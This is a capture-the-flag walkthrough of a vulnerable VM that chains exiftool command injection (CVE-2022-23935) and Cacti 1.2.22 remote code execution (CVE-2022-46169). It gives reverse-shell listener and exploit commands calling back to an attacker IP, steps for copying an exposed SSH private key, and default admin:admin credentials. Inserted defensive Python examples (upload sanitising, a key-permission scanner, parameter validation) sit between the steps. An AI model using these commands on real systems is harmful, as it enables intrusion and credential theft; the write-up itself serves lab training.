Sample VM Writeup

The document outlines a step-by-step process for exploiting a vulnerable virtual machine (VM) with a private IP of 10.0.2.4, which has open ports 22 and 80. It details the discovery of a web application using Exiftool with a known vulnerability (CVE-2022-23935) that allows command injection, leading to privilege escalation through SSH access. The process culminates in exploiting another vulnerability in a web application called Cacti to gain a shell access, successfully completing the task of solving the box.

Uploaded by

dinesh007aced

Vulnerable VM

Solving the Box.


The first thing to do is to find the vulnerable machine on the network. Start by doing an Nmap scan.

We found the vulnerable VM, with a private IP address of 10.0.2.4.

It also shows two open ports, 22 and 80.

Port 22 is SSH and port 80 is HTTP. This means there is a web server running on port 80. Let’s open a browser and check it out.
We can see a webpage that allows us to file complaints. If you file one, it takes you to another page.

Checking the website’s sources doesn’t reveal anything else either. Next, fuzz the web application to find other directories.
The tool ffuf performs directory brute forcing.

A directory called actual has been discovered.

This is an image analysis website. We can upload an image; it is analyzed by exiftool and its metadata is printed on the webpage. The version of exiftool is 12.37.
Searching for vulnerabilities affecting this version of exiftool.

https://github.com/cowsecurity/CVE-2022-23935

CVE-2022-23935

The vulnerability arises from an improper file check, which leads to command injection.

The full patch can be found here.
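The root cause described above is that a user-controlled file name reaches exiftool unchanged. Upgrading exiftool is the fix; the defense-in-depth on the web-application side is to never let the client choose the name of the file that gets analyzed. The following is an added example of such an upload handler, written for this page and not taken from the vulnerable site or from the exiftool project: the allow-list, the `store_upload`/`exiftool_argv` names and the hypothetical upload directory are all assumptions.

```python
import os
import re
import secrets
import subprocess
import tempfile

# Extensions the hypothetical analysis site is willing to analyze (constructed allow-list).
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "tif", "tiff"}


def _extension_of(client_name):
    """Lower-cased extension of the client-supplied name, or '' if it has none."""
    return client_name.rsplit(".", 1)[1].lower() if "." in client_name else ""


def is_accepted(client_name):
    """True only if the extension is plain alphanumerics and on the allow-list."""
    ext = _extension_of(client_name)
    return bool(re.fullmatch(r"[a-z0-9]{1,5}", ext)) and ext in ALLOWED_EXT


def store_upload(data, client_name, upload_dir):
    """Write the upload under a server-generated name and return its path.

    The client-supplied name contributes nothing but its extension, and even
    that is checked against an allow-list, so characters that exiftool (or a
    shell) might interpret never reach the filesystem.
    """
    if not is_accepted(client_name):
        raise ValueError("unsupported or malformed file extension")
    name = f"{secrets.token_hex(16)}.{_extension_of(client_name)}"
    path = os.path.join(upload_dir, name)
    # 'x' mode refuses to clobber an existing file; the random name makes collisions negligible
    with open(path, "xb") as fh:
        fh.write(data)
    return path


def exiftool_argv(path):
    """Argument vector for the analysis step: a list, never a shell string."""
    return ["exiftool", "-j", path]  # -j prints the metadata as JSON


def analyze(path):
    """Run exiftool on a stored file (not exercised by the self-test; exiftool may be absent)."""
    result = subprocess.run(exiftool_argv(path), capture_output=True, text=True, timeout=30)
    return result.stdout


def demo():
    """Constructed upload with a hostile-looking client name; returns the stored basename."""
    upload_dir = tempfile.mkdtemp(prefix="uploads-")
    path = store_upload(b"\xff\xd8\xff\xe0", "photo|id.jpg", upload_dir)
    return os.path.basename(path)


if __name__ == "__main__":
    print(demo())
```

The stored name is 32 hex characters plus an allow-listed extension, so whatever the browser sent as the file name is gone before exiftool runs; the argv list additionally keeps the path out of any shell parsing.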


Let’s download a publicly available PoC and run it against the system.

Downloading the PoC from GitHub. The PoC requires the pwn module in Python.

pip install pwn

Run the PoC with the attacker machine’s IP address and the port we will be listening on.

ip addr

python3 CVE-2022-23935.py ip port

Make sure to change the ip and port values to your machine’s IP address and the port number you want to listen on, as seen in the image above.

This will generate an image with a malicious file name, which will cause exiftool to execute commands.
Uploading the image file.

We get the shell.

The next step is to enumerate the machine for information that can help us gain higher privileges on it.

Traversing to the home directory, there is a user called Kermit.


In Kermit’s home there is a .ssh directory with SSH keys. But on any Linux system the private key has permissions of 400 or 600 by default. In this case, you can see the id_rsa file has permission 400.

But people copy these private keys to other folders, or in some cases generate keys in another location and then copy them into the .ssh directory.
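The stray copy of a private key with loose permissions is exactly what a periodic audit should catch. The following is an added example, not part of the original writeup: a small scanner that walks a directory tree, recognises private keys by well-known file names or by their PEM header, and reports any that are readable by group or other. It assumes POSIX permission bits; the `demo` function builds a constructed home tree with a 400 key in .ssh and a 444 copy in .bak, mirroring the situation described above.

```python
import os
import stat
import tempfile

# Conventional OpenSSH private-key file names (a .pub suffix marks the public half).
KEY_NAMES = ("id_rsa", "id_ed25519", "id_ecdsa", "id_dsa")
PEM_HEADER = b"-----BEGIN "


def looks_like_private_key(path):
    """True if the name, or the first bytes of the file, mark it as a private key."""
    name = os.path.basename(path)
    if name.endswith(".pub"):
        return False
    if name in KEY_NAMES:
        return True
    try:
        with open(path, "rb") as fh:
            head = fh.read(64)
    except OSError:
        return False  # unreadable to us: cannot classify, so not reported
    return head.startswith(PEM_HEADER) and b"PRIVATE KEY" in head


def find_exposed_keys(root):
    """Return [(path, mode)] for private keys whose mode grants group or other read access."""
    exposed = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks out of the tree
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not looks_like_private_key(path):
                continue
            if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
                exposed.append((path, oct(stat.S_IMODE(st.st_mode))))
    return sorted(exposed)


def demo():
    """Constructed home tree: a 400 key in .ssh and a 444 copy in .bak; returns the findings."""
    home = tempfile.mkdtemp(prefix="homes-")
    ssh_dir = os.path.join(home, "kermit", ".ssh")
    bak_dir = os.path.join(home, "kermit", ".bak")
    os.makedirs(ssh_dir)
    os.makedirs(bak_dir)
    # Constructed placeholder key material, not a real key.
    key = b"-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed\n-----END OPENSSH PRIVATE KEY-----\n"
    for directory, mode in ((ssh_dir, 0o400), (bak_dir, 0o444)):
        key_path = os.path.join(directory, "id_rsa")
        with open(key_path, "wb") as fh:
            fh.write(key)
        os.chmod(key_path, mode)
    pub_path = os.path.join(ssh_dir, "id_rsa.pub")
    with open(pub_path, "wb") as fh:
        fh.write(b"ssh-ed25519 AAAA constructed\n")
    os.chmod(pub_path, 0o644)  # public keys are meant to be world-readable
    return find_exposed_keys(home)


if __name__ == "__main__":
    for path, mode in demo():
        print(f"{mode} {path}")
```

Run against /home (or /root and /etc) from a cron job, the scan flags only the .bak copy; the properly protected key in .ssh and the world-readable public key are both silent.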

Let’s list the home directory again.

There is a .bak folder, and an id_rsa key is present in it with permission 444.
Grabbing the SSH key.

cat /home/kermit/.bak/id_rsa

Once we have the SSH key, copy it into a file on the attacker’s machine and change the file permissions of the private key.

chmod 600 id_rsa


The next thing to do is to ssh in. Make sure to put the IP address of your machine.
ssh [email protected] -i id_rsa

We can read the user flag now.

cat user.txt

user{cdc2ec2673abd58db14c8a70e231d007f6c2ae347b27b7c8e4eeb93e1ed61fdb}

There is a local web application running on the system. We can find this out by enumerating the file system. An entrypoint.sh file is present, which shows that a PHP server is being run on port 8000 with /var/www/html as its document root.

You can also run netstat to find the ports that are in use on the system.

netstat -an

We can forward this local web server to a port on the attacker machine using SSH.

ssh -L 8000:127.0.0.1:8000 [email protected] -i id_rsa


This will allow us to access the web application, which is reachable at http://127.0.0.1:8000/

We can see that the app is called Cacti and the version is 1.2.22.

Searching the web shows that this application is vulnerable to RCE.

https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22

The vulnerability arises because the poller_id parameter in the file remote_agent.php is not validated. Below you can see the vulnerable code. proc_open can be used to execute commands, and any unauthorized user can manipulate the poller_id parameter; there is no validation either.
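The two defects named above are an unauthenticated endpoint and a parameter that reaches a command-execution primitive without validation. As an added example (not Cacti’s code and not the project’s fix), the following simulated handler shows the contrast: the unsafe pattern of splicing the raw parameter into a command string, kept only for comparison and never executed, beside a hardened handler that requires authentication, accepts poller_id only as a positive integer, and passes it as a single argv element. The script path, the integer bound and the handler names are assumptions.

```python
import re

# A poller id is a database row id; a positive decimal integer is the only
# shape accepted here (the ten-digit bound is an assumption for this example).
POLLER_ID_RE = re.compile(r"[1-9][0-9]{0,9}")
AGENT_SCRIPT = "/opt/agent/collect.sh"  # hypothetical script, not Cacti's real poller


class BadRequest(ValueError):
    """Raised when a request parameter fails validation."""


def parse_poller_id(raw):
    """Accept only a positive decimal integer string; everything else is rejected before use."""
    if not isinstance(raw, str) or not POLLER_ID_RE.fullmatch(raw):
        raise BadRequest("poller_id must be a positive integer")
    return int(raw)


def unsafe_command_string(raw):
    """The pattern the writeup describes: untrusted text spliced into shell command text.

    Kept for contrast only; nothing in this example executes it.
    """
    return f"{AGENT_SCRIPT} --poller {raw}"


def build_agent_argv(poller_id):
    """Hardened form: the validated integer is one argv element; no shell is involved."""
    return [AGENT_SCRIPT, "--poller", str(poller_id)]


def handle_remote_agent(params, authenticated):
    """Simulated endpoint returning (HTTP status, argv list or error message).

    Authentication is checked first, then the parameter is validated, and only
    then is a command vector built; a shell metacharacter in poller_id never
    gets past parse_poller_id.
    """
    if not authenticated:
        return 403, "authentication required"
    try:
        poller_id = parse_poller_id(params.get("poller_id"))
    except BadRequest as exc:
        return 400, str(exc)
    return 200, build_agent_argv(poller_id)


if __name__ == "__main__":
    print(handle_remote_agent({"poller_id": "1"}, authenticated=True))
    print(handle_remote_agent({"poller_id": "1 extra"}, authenticated=True))
```

The same request that works against the string-building form is turned away with a 400 by the hardened handler, and an unauthenticated caller never reaches the parameter check at all.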
We need to log in to the application and create a graph first, since that is required for this to work.

The default creds admin:admin will work for the login. Once we are in the system, click on
Create Graphs.

You might have to install the application first. The system admin only set up the application a few days back.

You can choose from several templates in the create option. What we are looking for are the templates that monitor the system; in this case, Device Uptime is one.
Click Create. This will create a template that we can exploit.

Create a listener on the port where you want to get the shell.

nc -nvlp 1337



Now use the PoC given in the above link.

python3 exp.py -u http://127.0.0.1:8000 --LHOST=10.0.2.5 --LPORT=1337


Congrats!! You have solved the box!!
